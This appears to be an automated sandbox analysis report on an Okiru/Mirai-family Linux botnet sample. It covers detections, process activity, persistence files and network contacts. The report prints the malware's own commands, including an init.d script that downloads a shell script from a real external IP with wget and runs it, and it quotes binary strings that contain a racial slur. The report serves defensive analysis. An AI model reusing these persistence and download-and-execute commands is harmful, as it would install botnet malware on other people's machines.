Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
sh4.nn.elf

Overview

General Information

Sample name:sh4.nn.elf
Analysis ID:1580245
MD5:a77b2146e2cee3edd81794c6dc36cc4f
SHA1:9a7e1e6b0a404bad276c263c904774e7d3b12a66
SHA256:98f07d8da535ace7c61c1de942960e763490483c02a811d38b6f59496e05b498
Tags:elfuser-abuse_ch
Infos:

Detection

Okiru
Score:80
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Okiru
Drops files in suspicious directories
Sample tries to persist itself using /etc/profile
Sample tries to persist itself using System V runlevels
Sample tries to set files in /etc globally writable
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "mkdir" command used to create folders
Executes the "rm" command used to delete files or directories
Executes the "systemctl" command used for controlling the systemd system and service manager
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Writes shell script file to disk with an unusual file extension

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1580245
Start date and time:2024-12-24 06:27:04 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 56s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:sh4.nn.elf
Detection:MAL
Classification:mal80.spre.troj.evad.linELF@0/10@0/0
Command:/tmp/sh4.nn.elf
PID:6247
Exit Code:139
Exit Code Info:SIGSEGV (11) Segmentation fault invalid memory reference
Killed:False
Standard Output:

Standard Error:qemu: uncaught target signal 11 (Segmentation fault) - core dumped
  • system is lnxubuntu20
  • dash New Fork (PID: 6221, Parent: 4332)
  • rm (PID: 6221, Parent: 4332, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.upQr27eWjM /tmp/tmp.3jzKS2POjU /tmp/tmp.3e5IeyVG3c
  • dash New Fork (PID: 6222, Parent: 4332)
  • rm (PID: 6222, Parent: 4332, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.upQr27eWjM /tmp/tmp.3jzKS2POjU /tmp/tmp.3e5IeyVG3c
  • sh4.nn.elf (PID: 6247, Parent: 6149, MD5: 8943e5f8f8c280467b4472c15ae93ba9) Arguments: /tmp/sh4.nn.elf
    • sh (PID: 6270, Parent: 6247, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable custom.service >/dev/null 2>&1"
      • sh New Fork (PID: 6272, Parent: 6270)
      • systemctl (PID: 6272, Parent: 6270, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable custom.service
    • sh (PID: 6288, Parent: 6247, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
      • sh New Fork (PID: 6294, Parent: 6288)
      • chmod (PID: 6294, Parent: 6288, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/system
    • sh (PID: 6295, Parent: 6247, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
      • sh New Fork (PID: 6300, Parent: 6295)
      • ln (PID: 6300, Parent: 6295, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/system /etc/rcS.d/S99system
    • sh (PID: 6301, Parent: 6247, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh4.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh4.nn.elf'\n /tmp/sh4.nn.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh4.nn.elf'\n killall sh4.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh4.nn.elf"
    • sh (PID: 6303, Parent: 6247, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/sh4.nn.elf >/dev/null 2>&1"
      • sh New Fork (PID: 6305, Parent: 6303)
      • chmod (PID: 6305, Parent: 6303, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/sh4.nn.elf
    • sh (PID: 6306, Parent: 6247, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
      • sh New Fork (PID: 6311, Parent: 6306)
      • mkdir (PID: 6311, Parent: 6306, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir -p /etc/rc.d
    • sh (PID: 6312, Parent: 6247, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/sh4.nn.elf /etc/rc.d/S99sh4.nn.elf >/dev/null 2>&1"
      • sh New Fork (PID: 6317, Parent: 6312)
      • ln (PID: 6317, Parent: 6312, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/sh4.nn.elf /etc/rc.d/S99sh4.nn.elf
  • udisksd New Fork (PID: 6259, Parent: 799)
  • dumpe2fs (PID: 6259, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • systemd New Fork (PID: 6285, Parent: 6284)
  • snapd-env-generator (PID: 6285, Parent: 6284, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • udisksd New Fork (PID: 6330, Parent: 799)
  • dumpe2fs (PID: 6330, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 6364, Parent: 799)
  • dumpe2fs (PID: 6364, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • cleanup
SourceRuleDescriptionAuthorStrings
sh4.nn.elfJoeSecurity_OkiruYara detected OkiruJoe Security
    SourceRuleDescriptionAuthorStrings
    6247.1.00007ff828400000.00007ff828414000.r-x.sdmpJoeSecurity_OkiruYara detected OkiruJoe Security
      Process Memory Space: sh4.nn.elf PID: 6247JoeSecurity_OkiruYara detected OkiruJoe Security
        No Suricata rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: sh4.nn.elfAvira: detected
        Source: sh4.nn.elfReversingLabs: Detection: 31%
        Source: sh4.nn.elfString: getinfo xxxTSource Engine QueryNIGGERNIGGERGETCOURRPERTEDDDDDDDDDDHAHAHAHAHAHAAHAHAHHAHAMDWHO??wasHeERe.BIGDADDYCATISURDAD!/proc/self/exe(deleted)/proc/%s/exe/proc/...%s/%s/data/local/tmp//var/run/home/usr/bin/var/tmptmpfs/tmp/ttsize=10M/tmp/tt/system/proc/%d/proc/proc/%u/statusrPPid:/proc/%u/cmdline-bash-sh/bin/sh94.156.227.234locked Process: PID=%d, Bot-ID:%sFound And Killed Process: PID=%d, Realpath=%s, Bot-ID:%s2surf2/proc/%d/exe/proc/%d/cmdlinewgetcurlunknown%s (URL: %s)/./fd/socket/proc/%d/mountinfo/ /proc-altered/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/usr/mnt/sys/bin/boot/media/srv/sbin/lib/etc/dev/telnetbashhttpdtelnetddropbearropbearencoder/var/tmp/wlancontwlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nntelnet.nn/init/opt/app/var/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincisshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/ping/pswiresharkechotcpdumpnetstatpythoniptablesnanonvimvimgdbpkillkillallapt/bin/loginnfstftpftpmalloc[start_pid_hopping] Failed to clone: %s
        Source: global trafficTCP traffic: 192.168.2.23:60024 -> 94.156.227.234:38242
        Source: /tmp/sh4.nn.elf (PID: 6247)Socket: 0.0.0.0:38242Jump to behavior
        Source: unknownTCP traffic detected without corresponding DNS query: 54.171.230.55
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: sh4.nn.elf, system.16.dr, inittab.16.dr, sh4.nn.elf.36.dr, profile.16.dr, custom.service.16.dr, bootcmd.16.drString found in binary or memory: http://94.156.227.233/
        Source: sh4.nn.elfString found in binary or memory: http://94.156.227.233/oro1vk
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33606
        Source: unknownNetwork traffic detected: HTTP traffic on port 33606 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
        Source: Initial sampleString containing 'busybox' found: /bin/busybox
        Source: Initial sampleString containing 'busybox' found: getinfo xxxTSource Engine QueryNIGGERNIGGERGETCOURRPERTEDDDDDDDDDDHAHAHAHAHAHAAHAHAHHAHAMDWHO??wasHeERe.BIGDADDYCATISURDAD!/proc/self/exe(deleted)/proc/%s/exe/proc/...%s/%s/data/local/tmp//var/run/home/usr/bin/var/tmptmpfs/tmp/ttsize=10M/tmp/tt/system/proc/%d/proc/proc/%u/statusrPPid:/proc/%u/cmdline-bash-sh/bin/sh94.156.227.234locked Process: PID=%d, Bot-ID:%sFound And Killed Process: PID=%d, Realpath=%s, Bot-ID:%s2surf2/proc/%d/exe/proc/%d/cmdlinewgetcurlunknown%s (URL: %s)/./fd/socket/proc/%d/mountinfo/ /proc-altered/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/usr/mnt/sys/bin/boot/media/srv/sbin/lib/etc/dev/telnetbashhttpdtelnetddropbearropbearencoder/var/tmp/wlancontwlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nntelnet.nn/init/opt/app/var/Challengeapp/hi3511gmDVR
        Source: ELF static info symbol of initial sample.symtab present: no
        Source: classification engineClassification label: mal80.spre.troj.evad.linELF@0/10@0/0

        Persistence and Installation Behavior

        barindex
        Source: /tmp/sh4.nn.elf (PID: 6247)File: /etc/profileJump to behavior
        Source: /tmp/sh4.nn.elf (PID: 6247)File: /etc/rc.localJump to behavior
        Source: /usr/bin/ln (PID: 6300)File: /etc/rcS.d/S99system -> /etc/init.d/systemJump to behavior
        Source: /usr/bin/ln (PID: 6317)File: /etc/rc.d/S99sh4.nn.elf -> /etc/init.d/sh4.nn.elfJump to behavior
        Source: /tmp/sh4.nn.elf (PID: 6247)File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)Jump to behavior
        Source: /usr/bin/chmod (PID: 6294)File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)Jump to behavior
        Source: /usr/bin/chmod (PID: 6305)File: /etc/init.d/sh4.nn.elf (bits: - usr: rx grp: rx all: rwx)Jump to behavior
        Source: /tmp/sh4.nn.elf (PID: 6320)File opened: /proc/6395/statusJump to behavior
        Source: /tmp/sh4.nn.elf (PID: 6320)File opened: /proc/6053/cmdlineJump to behavior
        Source: /tmp/sh4.nn.elf (PID: 6320)File opened: /proc/6394/statusJump to behavior
        Source: /tmp/sh4.nn.elf (PID: 6320)File opened: /proc/6364/statusJump to behavior
        Source: /tmp/sh4.nn.elf (PID: 6320)File opened: /proc/6397/statusJump to behavior
        Source: /tmp/sh4.nn.elf (PID: 6320)File opened: /proc/6396/statusJump to behavior
        Source: /tmp/sh4.nn.elf (PID: 6320)File opened: /proc/6388/statusJump to behavior
        Source: /tmp/sh4.nn.elf (PID: 6320)File opened: /proc/6399/statusJump to behavior
        Source: /tmp/sh4.nn.elf (PID: 6320)File opened: /proc/6387/statusJump to behavior
        Source: /tmp/sh4.nn.elf (PID: 6320)File opened: /proc/6398/statusJump to behavior
        Source: /tmp/sh4.nn.elf (PID: 6320)File opened: /proc/6401/statusJump to behavior
        Source: /tmp/sh4.nn.elf (PID: 6320)File opened: /proc/6389/statusJump to behavior
        Source: /tmp/sh4.nn.elf (PID: 6320)File opened: /proc/6400/statusJump to behavior
        Source: /tmp/sh4.nn.elf (PID: 6320)File opened: /proc/6391/statusJump to behavior
        Source: /tmp/sh4.nn.elf (PID: 6320)File opened: /proc/6390/statusJump to behavior
        Source: /tmp/sh4.nn.elf (PID: 6320)File opened: /proc/6393/statusJump to behavior
        Source: /tmp/sh4.nn.elf (PID: 6320)File opened: /proc/6392/statusJump to behavior
        Source: /tmp/sh4.nn.elf (PID: 6320)File opened: /proc/799/cmdlineJump to behavior
        Source: /tmp/sh4.nn.elf (PID: 6320)File opened: /proc/6403/statusJump to behavior
        Source: /tmp/sh4.nn.elf (PID: 6320)File opened: /proc/6402/statusJump to behavior
        Source: /tmp/sh4.nn.elf (PID: 6320)File opened: /proc/6404/statusJump to behavior
        Source: /tmp/sh4.nn.elf (PID: 6270)Shell command executed: sh -c "systemctl enable custom.service >/dev/null 2>&1"Jump to behavior
        Source: /tmp/sh4.nn.elf (PID: 6288)Shell command executed: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"Jump to behavior
        Source: /tmp/sh4.nn.elf (PID: 6295)Shell command executed: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"Jump to behavior
        Source: /tmp/sh4.nn.elf (PID: 6301)Shell command executed: sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh4.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh4.nn.elf'\n /tmp/sh4.nn.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh4.nn.elf'\n killall sh4.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh4.nn.elf"Jump to behavior
        Source: /tmp/sh4.nn.elf (PID: 6303)Shell command executed: sh -c "chmod +x /etc/init.d/sh4.nn.elf >/dev/null 2>&1"Jump to behavior
        Source: /tmp/sh4.nn.elf (PID: 6306)Shell command executed: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"Jump to behavior
        Source: /tmp/sh4.nn.elf (PID: 6312)Shell command executed: sh -c "ln -s /etc/init.d/sh4.nn.elf /etc/rc.d/S99sh4.nn.elf >/dev/null 2>&1"Jump to behavior
        Source: /bin/sh (PID: 6294)Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/systemJump to behavior
        Source: /bin/sh (PID: 6305)Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/sh4.nn.elfJump to behavior
        Source: /bin/sh (PID: 6311)Mkdir executable: /usr/bin/mkdir -> mkdir -p /etc/rc.dJump to behavior
        Source: /usr/bin/dash (PID: 6221)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.upQr27eWjM /tmp/tmp.3jzKS2POjU /tmp/tmp.3e5IeyVG3cJump to behavior
        Source: /usr/bin/dash (PID: 6222)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.upQr27eWjM /tmp/tmp.3jzKS2POjU /tmp/tmp.3e5IeyVG3cJump to behavior
        Source: /bin/sh (PID: 6272)Systemctl executable: /usr/bin/systemctl -> systemctl enable custom.serviceJump to behavior
        Source: /tmp/sh4.nn.elf (PID: 6247)File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)Jump to behavior
        Source: /usr/bin/chmod (PID: 6294)File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)Jump to behavior
        Source: /usr/bin/chmod (PID: 6305)File: /etc/init.d/sh4.nn.elf (bits: - usr: rx grp: rx all: rwx)Jump to behavior
        Source: /tmp/sh4.nn.elf (PID: 6247)Writes shell script file to disk with an unusual file extension: /etc/init.d/systemJump to dropped file
        Source: /tmp/sh4.nn.elf (PID: 6247)Writes shell script file to disk with an unusual file extension: /etc/rc.localJump to dropped file
        Source: /bin/sh (PID: 6301)Writes shell script file to disk with an unusual file extension: /etc/init.d/sh4.nn.elfJump to dropped file

        Hooking and other Techniques for Hiding and Protection

        barindex
        Source: /tmp/sh4.nn.elf (PID: 6247)File: /etc/init.d/systemJump to dropped file
        Source: /bin/sh (PID: 6301)File: /etc/init.d/sh4.nn.elfJump to dropped file
        Source: /tmp/sh4.nn.elf (PID: 6247)Queries kernel information via 'uname': Jump to behavior
        Source: sh4.nn.elf, 6247.1.00007fffac5c3000.00007fffac5e4000.rw-.sdmpBinary or memory string: /tmp/qemu-open.7ouZ2A
        Source: sh4.nn.elf, 6247.1.00007fffac5c3000.00007fffac5e4000.rw-.sdmpBinary or memory string: V/tmp/qemu-open.7ouZ2A
        Source: sh4.nn.elf, 6247.1.00007fffac5c3000.00007fffac5e4000.rw-.sdmpBinary or memory string: /qemu-open.XXXXX
        Source: sh4.nn.elf, 6247.1.00007fffac5c3000.00007fffac5e4000.rw-.sdmpBinary or memory string: /usr/bin/qemu-sh4
        Source: sh4.nn.elf, 6247.1.000056187975b000.00005618797df000.rw-.sdmpBinary or memory string: /usr/bin/vmtoolsd
        Source: sh4.nn.elf, 6247.1.00007fffac5c3000.00007fffac5e4000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-sh4/tmp/sh4.nn.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/sh4.nn.elf
        Source: sh4.nn.elf, 6247.1.000056187975b000.00005618797df000.rw-.sdmpBinary or memory string: V!/usr/bin/vmtoolsd
        Source: sh4.nn.elf, 6247.1.000056187975b000.00005618797df000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/sh4
        Source: sh4.nn.elf, 6247.1.00007fffac5c3000.00007fffac5e4000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
        Source: sh4.nn.elf, 6247.1.00007fffac5c3000.00007fffac5e4000.rw-.sdmpBinary or memory string: /qemu-open.XXXXXSXPF
        Source: sh4.nn.elf, 6247.1.000056187975b000.00005618797df000.rw-.sdmpBinary or memory string: V5!/etc/qemu-binfmt/sh4

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: sh4.nn.elf, type: SAMPLE
        Source: Yara matchFile source: 6247.1.00007ff828400000.00007ff828414000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: sh4.nn.elf PID: 6247, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: sh4.nn.elf, type: SAMPLE
        Source: Yara matchFile source: 6247.1.00007ff828400000.00007ff828414000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: sh4.nn.elf PID: 6247, type: MEMORYSTR
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information2
        Scripting
        Valid AccountsWindows Management Instrumentation1
        Unix Shell Configuration Modification
        1
        Unix Shell Configuration Modification
        1
        Masquerading
        1
        OS Credential Dumping
        11
        Security Software Discovery
        Remote ServicesData from Local System1
        Encrypted Channel
        Exfiltration Over Other Network Medium1
        Data Manipulation
        CredentialsDomainsDefault AccountsScheduled Task/Job1
        Systemd Service
        1
        Systemd Service
        2
        File and Directory Permissions Modification
        LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
        Non-Standard Port
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAt2
        Scripting
        Logon Script (Windows)1
        File Deletion
        Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
        Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        No configs have been found
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Number of created Files
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1580245 Sample: sh4.nn.elf Startdate: 24/12/2024 Architecture: LINUX Score: 80 51 94.156.227.234, 38242, 60024, 60026 NETIXBG Bulgaria 2->51 53 109.202.202.202, 80 INIT7CH Switzerland 2->53 55 3 other IPs or domains 2->55 57 Antivirus / Scanner detection for submitted sample 2->57 59 Multi AV Scanner detection for submitted file 2->59 61 Yara detected Okiru 2->61 8 dash rm sh4.nn.elf 2->8         started        12 udisksd dumpe2fs 2->12         started        14 udisksd dumpe2fs 2->14         started        16 3 other processes 2->16 signatures3 process4 file5 43 /etc/rc.local, POSIX 8->43 dropped 45 /etc/profile, ASCII 8->45 dropped 47 /etc/init.d/system, POSIX 8->47 dropped 63 Sample tries to set files in /etc globally writable 8->63 65 Sample tries to persist itself using /etc/profile 8->65 67 Drops files in suspicious directories 8->67 69 Sample tries to persist itself using System V runlevels 8->69 18 sh4.nn.elf sh 8->18         started        20 sh4.nn.elf sh 8->20         started        22 sh4.nn.elf sh 8->22         started        24 5 other processes 8->24 signatures6 process7 file8 28 sh chmod 18->28         started        31 sh ln 20->31         started        33 sh chmod 22->33         started        49 /etc/init.d/sh4.nn.elf, POSIX 24->49 dropped 71 Drops files in suspicious directories 24->71 35 sh ln 24->35         started        37 sh systemctl 24->37         started        39 sh mkdir 24->39         started        41 sh4.nn.elf 24->41         started        signatures9 process10 signatures11 73 Sample tries to set files in /etc globally writable 28->73 75 Sample tries to persist itself using System V runlevels 31->75
        SourceDetectionScannerLabelLink
        sh4.nn.elf32%ReversingLabsLinux.Exploit.Mirai
        sh4.nn.elf100%AviraEXP/ELF.Mirai.W
        SourceDetectionScannerLabelLink
        /etc/rc.local0%ReversingLabs
        /etc/rc.local0%VirustotalBrowse
        No Antivirus matches
        No Antivirus matches
        No contacted domains info
        NameSourceMaliciousAntivirus DetectionReputation
        http://94.156.227.233/oro1vksh4.nn.elffalse
          high
          http://94.156.227.233/sh4.nn.elf, system.16.dr, inittab.16.dr, sh4.nn.elf.36.dr, profile.16.dr, custom.service.16.dr, bootcmd.16.drfalse
            high
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            54.171.230.55
            unknownUnited States
            16509AMAZON-02USfalse
            109.202.202.202
            unknownSwitzerland
            13030INIT7CHfalse
            94.156.227.234
            unknownBulgaria
            57463NETIXBGfalse
            91.189.91.43
            unknownUnited Kingdom
            41231CANONICAL-ASGBfalse
            91.189.91.42
            unknownUnited Kingdom
            41231CANONICAL-ASGBfalse
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            54.171.230.55mipsel.nn.elfGet hashmaliciousOkiruBrowse
              zerarm6.elfGet hashmaliciousUnknownBrowse
                mips.elfGet hashmaliciousUnknownBrowse
                  hidakibest.arm7.elfGet hashmaliciousGafgyt, MiraiBrowse
                    Space.x86.elfGet hashmaliciousMiraiBrowse
                      nn.elfGet hashmaliciousNanominer, XmrigBrowse
                        arm6.nn.elfGet hashmaliciousMirai, OkiruBrowse
                          dlr.arm6.elfGet hashmaliciousUnknownBrowse
                            arm6.elfGet hashmaliciousMiraiBrowse
                              http://112.31.189.32:40158Get hashmaliciousMiraiBrowse
                                109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
                                • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
                                94.156.227.234mips.nn.elfGet hashmaliciousOkiruBrowse
                                  x86_64.nn.elfGet hashmaliciousOkiruBrowse
                                    sh4.nn.elfGet hashmaliciousOkiruBrowse
                                      arm.nn.elfGet hashmaliciousOkiruBrowse
                                        x86_32.nn.elfGet hashmaliciousOkiruBrowse
                                          mipsel.nn.elfGet hashmaliciousOkiruBrowse
                                            arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                              powerpc.nn.elfGet hashmaliciousOkiruBrowse
                                                x86_32.nn.elfGet hashmaliciousOkiruBrowse
                                                  arm7.nn-20241224-0051.elfGet hashmaliciousMirai, OkiruBrowse
                                                    91.189.91.43bot.ppc.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                      sh4.nn.elfGet hashmaliciousOkiruBrowse
                                                        arm.nn.elfGet hashmaliciousOkiruBrowse
                                                          mipsel.nn.elfGet hashmaliciousOkiruBrowse
                                                            nklarm6.elfGet hashmaliciousUnknownBrowse
                                                              nabarm6.elfGet hashmaliciousUnknownBrowse
                                                                zerarm6.elfGet hashmaliciousUnknownBrowse
                                                                  armv4eb.elfGet hashmaliciousUnknownBrowse
                                                                    x86_32.nn.elfGet hashmaliciousOkiruBrowse
                                                                      tftp.elfGet hashmaliciousUnknownBrowse
                                                                        No context
